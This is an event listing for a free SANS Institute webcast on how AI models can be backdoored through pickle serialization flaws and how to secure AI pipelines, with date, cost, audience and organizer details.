Backdooring AI Models
During this Webcast we will examines how AI models can be backdoored using vulnerabilities in serialization formats like Pickle. We will highlight the risks of untrusted models, demonstrate real-world techniques, and discuss strategies to secure AI pipelines against such attacks.
This webcast supports content and knowledge from SEC545: GenAI and LLM Application Security™. To learn more about this course, explore upcoming sessions, and access your FREE demo, click here.
Speaker and Presenter Information
Relevant Government Agencies
Other Federal Agencies, Federal Government, State & Local Government
Event Type
Webcast
When
Thu, Mar 20, 2025, 12:00pm
ET
Cost
Complimentary: $ 0.00
Website
Click here to visit event website
Organizer
SANS Institute